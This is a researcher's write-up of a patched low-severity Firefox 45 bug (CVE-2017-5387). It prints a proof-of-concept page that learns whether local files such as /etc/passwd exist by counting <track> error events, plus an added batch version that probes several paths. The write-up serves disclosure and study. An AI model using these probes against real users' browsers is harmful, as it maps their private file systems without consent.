Firefox Local Filename Enumeration (sec-low)

Hello everyone,

This is going to be a short write-up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type "csectype-disclosure" (Mozilla's Bugzilla keyword for information-disclosure bugs) and was rated sec-low by Mozilla's team because the malicious page has to be loaded locally (via the file:// scheme) before it can probe other local files.

The bug existed because a <track> element's onerror event fires twice if the file pointed to by its src attribute doesn't exist, but fires only once if the file exists but is not playable (for example a text file such as /etc/passwd, which is not valid WebVTT). The <track> has to be placed between the opening and closing tags of an <audio> or <video> element. Counting the error events after a short delay therefore tells the page whether an arbitrary local path exists. The following code is the PoC that was sent along with the report to Mozilla's team:

<html>
<head>
<title>Testing</title>
</head>
<body>
<audio>
   <!-- Probe any local path; /etc/passwd exists but is not a playable (WebVTT) track -->
   <track id="q" src="file:///etc/passwd">
</audio>
<script>
var i=0;
// The track element is reachable as the global "q" through its id attribute.
q.onerror=function(){
    i++;  // fires once if the file exists but is unplayable, twice if it does not exist
};
// Give the track loader time to emit its error event(s) before reading the count.
setTimeout(function(){
    if(i==1){
        alert('File Exists');
    }else{
        alert('File Does Not Exist');
    }
},100);
</script>
</body>
</html>
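The PoC above tests a single path. The following is an added example, not code from the original post, that generalizes the same primitive to a list of candidate paths: one <track> per path inside a single <audio>, an error count per track, and a classifier that maps the count back to "exists" / "missing". It assumes the Firefox 45 behaviour described above (two error events for a missing file, one for an existing but unplayable file); the `settleMs` delay, the `track.track.mode = 'hidden'` line (added so that spec-following browsers request the track at all) and the sample paths are my assumptions. On a browser where this bug is fixed every probe should come back "unknown".

```javascript
// Added example (not from the original post): batch local-file existence probe
// built on the <track> onerror counting primitive described above.
// Assumption: an affected build (e.g. Firefox 45) and a page loaded via file://.

const ERROR_COUNT_EXISTS = 1;   // file exists but is not a playable WebVTT track
const ERROR_COUNT_MISSING = 2;  // file does not exist

// Pure classification of an error count, so the logic can be tested outside a browser.
// 0 (or anything unexpected) means the browser gave nothing away: patched build,
// page not served from file://, or the timeout was too short.
function classifyErrorCount(count) {
  if (count === ERROR_COUNT_EXISTS) return 'exists';
  if (count === ERROR_COUNT_MISSING) return 'missing';
  return 'unknown';
}

// Per-path tally of error events; results() maps each path to its classification.
function makeTally(paths) {
  const counts = new Map(paths.map(p => [p, 0]));
  return {
    record(path) { counts.set(path, (counts.get(path) || 0) + 1); },
    results() {
      const out = {};
      for (const [path, n] of counts) out[path] = classifyErrorCount(n);
      return out;
    },
  };
}

// Browser-only part: build one <track> per candidate path, count its error events,
// and resolve with the classification after settleMs (assumed delay, like the 100 ms
// setTimeout in the original PoC).
function probePaths(paths, settleMs = 200) {
  return new Promise(resolve => {
    const tally = makeTally(paths);
    const audio = document.createElement('audio');
    for (const path of paths) {
      const track = document.createElement('track');
      track.src = path;
      track.addEventListener('error', () => tally.record(path));
      audio.appendChild(track);
      // Assumption: ask for the track explicitly; per spec a track in "disabled"
      // mode is never fetched, while Firefox 45 fetched it regardless.
      track.track.mode = 'hidden';
    }
    document.body.appendChild(audio);
    setTimeout(() => {
      audio.remove();
      resolve(tally.results());
    }, settleMs);
  });
}

// Usage from a file:// page; the candidate paths are constructed sample input.
if (typeof document !== 'undefined') {
  probePaths(['file:///etc/passwd', 'file:///etc/shadow', 'file:///does/not/exist'])
    .then(results => console.log(results));
}
```

The counting logic is kept separate from the DOM code on purpose: `classifyErrorCount` and `makeTally` document exactly which observation the page relies on (one event versus two), which is also the thing a fix has to remove.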

Finally, I would like to give a shout-out to @Qab for making all of this possible.

Update: This bug has been assigned CVE-2017-5387.
